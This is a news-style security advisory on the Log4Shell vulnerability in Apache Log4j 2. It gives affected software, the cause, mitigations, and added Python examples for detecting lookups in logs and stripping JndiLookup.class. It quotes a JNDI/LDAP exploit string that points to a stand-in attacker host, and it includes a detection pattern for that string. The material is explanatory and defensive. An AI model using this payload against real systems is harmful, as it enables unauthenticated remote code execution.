Log4Shell, a critical vulnerability in Apache Log4j 2 that affects many Java projects

News recently broke that a critical vulnerability has been identified in Apache Log4j 2, a popular logging framework for Java applications. It allows arbitrary code execution whenever a specially formatted value of the form "${jndi:URL}" is written to the log.

The vulnerability is notable because the attack can be carried out against Java applications that log values received from external sources, for example by echoing problematic values in error messages.

Almost every project built on frameworks such as Apache Struts, Apache Solr, Apache Druid or Apache Flink is reportedly affected, including Steam, Apple iCloud, and Minecraft clients and servers.

The vulnerability is expected to trigger a wave of mass attacks on enterprise applications, repeating the history of critical vulnerabilities in the Apache Struts framework, which by a rough estimate is used in 65% of the web applications of Fortune 100 companies. Attempts to scan the network for vulnerable systems have already been recorded.

The vulnerability allows unauthenticated remote code execution. Log4j 2 is an open-source Java logging library developed by the Apache Foundation. Log4j 2 is widely used in many applications and is present, as a dependency, in many services. This includes enterprise applications as well as numerous cloud services.

The Randori attack team has developed a working exploit and has successfully exploited this vulnerability in customer environments as part of our offensive security platform.

The vulnerability can be reached through a number of paths directly into the application. In fact, any scenario in which a remote connection can supply arbitrary data that an application using the Log4j library writes to its log files is at risk of exploitation. This vulnerability is likely to be exploited in the wild and could affect thousands of organizations. It represents a significant real-world risk to affected systems.

The problem is compounded by the fact that a working exploit has already been released, but fixes for the stable branches have not yet been produced. A CVE identifier has not yet been assigned. The fix is only included in the test branch log4j-2.15.0-rc1. As a workaround to block the vulnerability, it is recommended to set the log4j2.formatMsgNoLookups parameter to true.

The problem is caused by the fact that Log4j 2 supports processing special "${}" masks in log lines, through which JNDI (Java Naming and Directory Interface) queries can be executed.

From its analysis of CVE-2021-44228, Randori has determined the following:

  • Default installations of widely used enterprise software are vulnerable.
  • The vulnerability can be exploited reliably and without authentication.
  • The vulnerability affects multiple versions of Log4j 2.
  • The vulnerability allows remote code execution as the user running the application that uses the library.

The attack boils down to passing a string containing the substitution "${jndi:ldap://example.com/a}"; when Log4j 2 processes it, it sends an LDAP request for the path to a Java class on the attacker.com server. The path returned by the attacker's server (for example http://example.com/Exploit.class) is loaded and executed in the context of the current process, allowing the attacker to achieve arbitrary code execution on the system with the privileges of the current application.
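The log-side view of the lookup described above, as an added detection example that is not part of the original article: a scanner over constructed access-log lines that flags any Log4j 2 lookup syntax arriving from a client, rating a "${jndi:...}" lookup as critical. The log format, the Finding structure and the helper names are assumptions.

```python
import re
from dataclasses import dataclass

# Constructed sample access-log lines (not from the article). A lookup string
# sent in the User-Agent header ends up in the application log as soon as the
# application logs that header through Log4j 2.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "Mozilla/5.0"
10.0.0.7 - - [10/Dec/2021:10:01:05 +0000] "GET /login HTTP/1.1" 200 311 "${jndi:ldap://example.com/a}"
10.0.0.9 - - [10/Dec/2021:10:01:09 +0000] "GET /api HTTP/1.1" 404 0 "curl/7.68.0"
10.0.0.9 - - [10/Dec/2021:10:01:11 +0000] "GET /api HTTP/1.1" 200 77 "${env:HOME}"
"""

# Any ${prefix:...} lookup inside client-supplied data is suspicious, because
# Log4j 2 resolves it; a ${jndi:...} lookup is the Log4Shell pattern itself.
LOOKUP_RE = re.compile(r"\$\{\s*([a-z0-9_-]+)\s*:([^}]*)\}", re.IGNORECASE)

@dataclass
class Finding:
    line_no: int
    source_ip: str
    prefix: str
    severity: str

def scan_log(text: str) -> list:
    """Return one Finding per lookup expression found in the log text."""
    findings = []
    for no, line in enumerate(text.splitlines(), start=1):
        source_ip = line.split(" ", 1)[0]
        for m in LOOKUP_RE.finditer(line):
            prefix = m.group(1).lower()
            severity = "critical" if prefix == "jndi" else "suspicious"
            findings.append(Finding(no, source_ip, prefix, severity))
    return findings

def affected_hosts(findings) -> set:
    """Source addresses that sent a jndi lookup: per the article, treat these
    as an active incident rather than noise."""
    return {f.source_ip for f in findings if f.prefix == "jndi"}

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.severity} lookup '{f.prefix}' from {f.source_ip}")
```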

Finally, it is noted that if anomalies are detected, you should assume this is an active incident, that you have been compromised, and respond accordingly. Updating the installed versions of Log4j 2 or of the affected applications will eliminate this vulnerability. Randori recommends that any organization that believes it may be affected upgrade to the patched version immediately.

In its latest update, the Apache Log4j team recommends that organizations do the following:

  • Upgrade to Log4j 2.15.0.
  • For those who cannot upgrade to 2.15.0: in versions >= 2.10, this vulnerability can be mitigated by setting the log4j2.formatMsgNoLookups system property or the LOG4J_FORMAT_MSG_NO_LOOKUPS environment variable to true.
  • For versions 2.0-beta9 through 2.10.0, the mitigation is to remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class.
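An added example that applies the three mitigation rules above to a deployment; it is not code from the article or from the Apache project. It builds a constructed stand-in jar, removes JndiLookup.class the way the zip -q -d command does, and reports whether a given version plus formatMsgNoLookups setting is covered. The helper names and the version-string handling are assumptions.

```python
import io
import zipfile

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"

def make_sample_jar() -> bytes:
    """Constructed stand-in for a log4j-core-2.10.0.jar (dummy class bodies)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("META-INF/MANIFEST.MF",
                   "Manifest-Version: 1.0\nImplementation-Version: 2.10.0\n")
        z.writestr("org/apache/logging/log4j/core/Logger.class", b"\xca\xfe\xba\xbe")
        z.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")
    return buf.getvalue()

def parse_version(v: str) -> tuple:
    # "2.10.0" -> (2, 10, 0); "2.0-beta9" -> (2, 0, 0), pre-release suffix ignored
    nums = [int(x) for x in v.split("-")[0].split(".")]
    return tuple((nums + [0, 0, 0])[:3])

def jar_has_jndi_lookup(jar_bytes: bytes) -> bool:
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as z:
        return JNDI_CLASS in z.namelist()

def remove_jndi_lookup(jar_bytes: bytes) -> bytes:
    """Same effect as: zip -q -d log4j-core-*.jar <JNDI_CLASS>"""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as src, \
         zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for name in src.namelist():
            if name != JNDI_CLASS:
                dst.writestr(name, src.read(name))
    return out.getvalue()

def assess(version: str, no_lookups: bool, class_present: bool) -> str:
    """Apply the article's rules: 2.15.0 fixes it; >= 2.10 is covered by
    formatMsgNoLookups=true; older builds only by removing JndiLookup."""
    v = parse_version(version)
    if v >= (2, 15, 0):
        return "fixed"
    if v >= (2, 10, 0) and no_lookups:
        return "mitigated (formatMsgNoLookups)"
    if not class_present:
        return "mitigated (JndiLookup removed)"
    return "vulnerable"
```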

Source: https://www.lunasec.io/

